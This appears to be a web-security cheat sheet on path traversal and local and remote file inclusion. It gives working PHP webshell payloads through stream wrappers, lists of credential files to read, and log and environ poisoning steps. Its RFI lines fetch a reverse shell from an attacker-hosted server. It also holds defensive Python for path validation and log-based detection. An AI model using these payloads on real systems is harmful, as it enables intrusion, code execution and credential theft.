File Inclusion
File Inclusion refers to an inclusion attack through which an attacker can trick the web application into including files on the web server.
Introduction
Path traversal can lead to two different types of file inclusion:
Local File Inclusion (LFI): when it is possible to include a local file from the server's filesystem.
Remote File Inclusion (RFI): when it is possible to include a file fetched from a remote host.
Path Traversal
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.

A search for path traversal begins by examining URL query strings and form bodies for values that look like file references; the most common indicator is a file extension inside the value.
<img src="/loadImage?filename=218.png">

The loadImage URL takes a filename parameter and returns the contents of the specified file. The image files themselves are stored on disk in the location /var/www/images/, so the request above resolves to the file:

/var/www/images/218.png

We can therefore request the following URL to retrieve an arbitrary file from the server's filesystem:

https://insecure-website.com/loadImage?filename=../../../etc/passwd

This causes the application to read from the following file path:

/var/www/images/../../../etc/passwd
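As an added example (editor's code in Python, not part of the original page), here is the shape of the resolver a loadImage-style handler should run on its filename parameter before touching the disk. It assumes the /var/www/images root from the example above and a small allowlist of image extensions; it rejects the traversal shown here, its URL-encoded and double-encoded variants, null-byte truncation and any scheme prefix such as the php://, data:// and zip:// wrappers described further down, and only then proves that the normalised path still lies inside the root.

```python
import posixpath
import re
from urllib.parse import unquote

# Directory the handler is allowed to serve from (taken from the loadImage
# example above); a real deployment would substitute its own root.
IMAGE_ROOT = "/var/www/images"
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# Anything that looks like "scheme:" at the start of a file name. A path
# parameter never legitimately carries one; in PHP this is exactly where the
# php://, data:, zip:, expect: and http:// wrappers get smuggled in.
SCHEME_RE = re.compile(r"^\s*[a-zA-Z][a-zA-Z0-9+.\-]*:")


def resolve_image_path(filename: str, root: str = IMAGE_ROOT) -> str:
    """Map an untrusted ?filename= value to a path inside root, or raise ValueError."""
    # 1. Decode once. If percent-encoding survives, the value was double-encoded,
    #    which is a classic filter bypass, so refuse it outright.
    decoded = unquote(filename)
    if unquote(decoded) != decoded:
        raise ValueError("double-encoded input")
    # 2. A null byte truncates the name in C-based runtimes ("x.png\0.php").
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    # 3. Refuse stream wrappers and URLs before any path logic runs.
    if SCHEME_RE.match(decoded):
        raise ValueError("scheme prefix not allowed")
    # 4. Treat backslashes as separators so "..\\.." normalises like "../..".
    candidate = decoded.replace("\\", "/")
    # 5. Join, normalise lexically, then prove containment. normpath collapses
    #    "..", so an escape shows up as a path outside root. (A deployment would
    #    also apply os.path.realpath so a symlink cannot point outside root.)
    full = posixpath.normpath(posixpath.join(root, candidate))
    if posixpath.commonpath([root, full]) != root:
        raise ValueError("path escapes root")
    # 6. Allowlist the extension: an image loader has no business reading
    #    .php, .conf or .log files even when they sit inside root.
    if posixpath.splitext(full)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return full


def check(filename: str) -> str:
    """Return the resolved path, or 'REJECTED: <reason>' for a refused value."""
    try:
        return resolve_image_path(filename)
    except ValueError as exc:
        return f"REJECTED: {exc}"


if __name__ == "__main__":
    # Constructed probe values mirroring the techniques described on this page.
    for value in [
        "218.png",
        "../../../etc/passwd",
        "..%2f..%2f..%2fetc/passwd",
        "%252e%252e%252fetc/passwd",
        "/etc/passwd",
        "..\\..\\windows\\win.ini",
        "218.png%00.php",
        "php://filter/convert.base64-encode/resource=index.php",
        "data:text/plain,<?php system($_GET['cmd']);?>",
        "http://attacker.example/shell.txt",
    ]:
        print(f"{value!r:60} -> {check(value)}")
```

The decisive check is containment after normalisation (commonpath), not a denylist of "../" strings; the scheme and null-byte checks exist so that the parameter can never reach a stream wrapper or a truncated name. Resolve with os.path.realpath as well in production so that a symlink inside the root cannot point outside it.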
Interesting Files
Once traversal is confirmed, some files are worth reading: files that reveal information about the server (users, groups, configuration), SSH keys, logs, etc.
Linux
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/proc/[0-9]*/fd/[0-9]*
/proc/mounts
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db

Apache
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log
Debian/Ubuntu -> /var/log/apache2/access.log
FreeBSD -> /var/log/httpd-access.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log

MySQL
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

Windows
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
/windows/system32/license.rtf
/windows/system32/eula.txt

Local File Inclusion (LFI)

It is similar to path traversal but not the same: with file inclusion, an included PHP file is interpreted and executed by the server, while with path traversal its contents are only read and returned.
PHP Wrappers
PHP provides several protocol wrappers that can be used when exploiting path traversal and local file inclusion vulnerabilities. They give additional flexibility when attempting to inject PHP code through an LFI.
Wrapper data://
Used to embed inline data as part of the URL, either as plaintext or base64. Including data:// only works when allow_url_include is enabled in php.ini.
/include.php?file=data:text/plain,<?php system($_GET["cmd"]);?>&cmd=id
/include.php?file=data:,<?php system($_GET["cmd"]);?>&cmd=id
/include.php?file=data:;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4=&cmd=id

Wrapper filter://
Used to encode or convert a file as it is read. Useful for reading PHP source, since the encoded output is returned instead of being executed. The php://filter scheme is case insensitive.
/include.php?file=php://filter/read=string.rot13/resource=file.php
/include.php?file=php://filter/convert.base64-encode/resource=file.php
/include.php?file=pHp://Filter/convert.base64-encode/resource=file.php
/include.php?file=php://filter/zlib.deflate/convert.base64-encode/resource=file.php

To read the compressed data, decode the base64 output and then inflate the result, for example from the PHP interactive shell:

php -a
readfile('php://filter/zlib.inflate/resource=test.deflated');

Wrapper zip://
Upload a zip file with a PHP shell inside and include the file within the archive through the wrapper (the archive can carry any extension, here .jpg). The $ is escaped so that the shell does not expand $_GET before it reaches the file:

echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

Wrapper expect://

Used to execute a system command directly. The expect wrapper is not enabled by default: it requires the expect PECL extension.

/include.php?file=expect://id

Wrapper input://
Interprets a PHP payload sent in the body of a POST request. As with data://, including php://input only works when allow_url_include is enabled.

/include.php?file=php://input
POST DATA: <?php system($_GET["cmd"]);?>

Remote File Inclusion (RFI)

Being able to make the application include a remote file is equivalent to remote code execution: we can include a webshell or a reverse shell. In PHP this requires allow_url_include to be enabled, which it is not by default.
/usr/share/webshells/php/php-reverse-shell.php

Or you can create a PHP file with command execution or another type of reverse shell:
<?php
// Run a command on the server and return its output (stderr merged into stdout)
$output = shell_exec('whoami 2>&1');
echo "$output";
?>

Finally, you only need to set up an HTTP server or SMB server hosting the file and request it through the vulnerable parameter:
/include.php?file=http://ip-addr:port/php-reverse-shell.php
/include.php?file=\\ip-addr\smbserver\php-reverse-shell.php

Sometimes impacket-smbserver does not work because the target machine only speaks an outdated SMB version, and the share has to be configured manually in Samba:
❯ cat /etc/samba/smb.conf
[global]
server role = standalone server
map to guest = Bad User
usershare allow guest = yes
hosts allow = <ip-target-machine>
[badsmb]
path = <directory>
browseable = yes
read only = no
guest ok = yes

Looking for RCE

There are several ways to escalate an LFI to RCE.
Via Log Poisoning
We can poison the web server log by sending PHP code in the User-Agent header, which the server writes verbatim to its access log:

GET / HTTP/1.0
Host: example.com
User-Agent: <?php system($_GET["cmd"]);?>

Then include /var/log/apache2/access.log (the log must be readable by the web server user):

/include.php?file=../../../../var/log/apache2/access.log&cmd=id

Via Email
If SMTP is open on the server, we can send a mail to a local account (for example user@localhost) containing the payload <?php system($_GET["cmd"]);?> and then include that user's mailbox:

/include.php?file=../../../../var/mail/user&cmd=id

Via Environ
As with a log file, a payload sent in the User-Agent header is reflected in /proc/self/environ, which exposes the environment of the process handling the request (on setups where request headers are passed to PHP as environment variables, e.g. CGI).

GET /include.php?file=../../../../proc/self/environ&cmd=id HTTP/1.0
Host: example.com
User-Agent: <?php system($_GET["cmd"]);?>

Via Upload
If the application lets us upload an arbitrary file, we can upload a reverse shell directly, or upload an image with the payload embedded in its metadata so that it passes content checks.

To modify the metadata of a file we can use exiftool:

exiftool -DocumentName='<?php system($_GET["cmd"]);?>' myimage.jpg

Once uploaded, we can include it:
/include.php?file=../../uploads/myimage.jpg&cmd=id
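The probes from the Path Traversal, PHP Wrappers, RFI and Looking for RCE sections all leave traces in the web server's access log. As an added example (editor's Python, not code from the original page), the following scanner reads constructed Apache combined-format log lines and tags the indicators a defender would alert on: traversal sequences after full URL decoding, double encoding, PHP stream wrappers, remote URLs in include parameters, references to the sensitive files listed above, and PHP tags in the User-Agent, which is the signature of the log poisoning and /proc/self/environ techniques. The log lines, the host 203.0.113.9 and the parameter names are constructed for the example; Apache's convention of logging a double quote inside a header as \" is assumed.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines (not real traffic). The poisoned
# User-Agent on the fifth line appears with \" because Apache escapes quotes
# inside logged headers; 203.0.113.9 is a documentation address.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /loadImage?filename=218.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /loadImage?filename=../../../etc/passwd HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /include.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 3301 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /include.php?file=http://203.0.113.9:8000/shell.txt HTTP/1.1" 500 0 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.0" 200 612 "-" "<?php system($_GET[\"cmd\"]);?>"
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /include.php?file=..%2f..%2f..%2f..%2fvar/log/apache2/access.log&cmd=id HTTP/1.1" 200 9001 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /include.php?file=..%252f..%252fproc/self/environ&cmd=id HTTP/1.1" 200 700 "-" "curl/8.0"
'''

# Combined log format; quoted fields may contain backslash-escaped characters.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)
# PHP stream wrappers that have no business appearing in a file parameter.
WRAPPER_RE = re.compile(r'(?:php|data|zip|phar|expect|glob|file):')
# A parameter whose value is a URL or a UNC path (backslashes are normalised to /).
REMOTE_RE = re.compile(r'=(?:https?:|ftp:)?//')
# Targets taken from the "Interesting Files" and "Looking for RCE" sections.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self/environ",
             "/var/log/", "/var/mail/", "id_rsa")


def deep_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so that double (or triple) encoding cannot hide '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line: str):
    """Return the list of indicator tags for one log line, or None if it does not parse."""
    match = LOG_RE.match(line)
    if not match:
        return None
    parts = match.group("req").split(" ")
    target = parts[1] if len(parts) >= 2 else match.group("req")
    decoded = deep_decode(target).replace("\\", "/").lower()
    tags = []
    if "../" in decoded:
        tags.append("traversal")
    if unquote(target) != deep_decode(target):
        tags.append("double-encoded")          # encoding layered to evade filters
    if WRAPPER_RE.search(decoded):
        tags.append("wrapper")
    if REMOTE_RE.search(decoded):
        tags.append("remote-include")
    if any(name in decoded for name in SENSITIVE):
        tags.append("sensitive-file")
    ua = match.group("ua").lower()
    if "<?php" in ua or "<?=" in ua:
        tags.append("ua-php-tag")              # log / environ poisoning attempt
    return tags


def scan(log_text: str):
    """Return [(line_number, tags)] for every line that carries at least one indicator."""
    hits = []
    for number, line in enumerate(log_text.strip().splitlines(), start=1):
        tags = classify(line)
        if tags:
            hits.append((number, tags))
    return hits


if __name__ == "__main__":
    for number, tags in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(tags)}")
```

The first line (a legitimate image request) produces no tags, while every probe on the page is flagged. A User-Agent containing a PHP tag is worth alerting on by itself: it has no benign explanation and appears in the log before the attacker has found the inclusion that executes it.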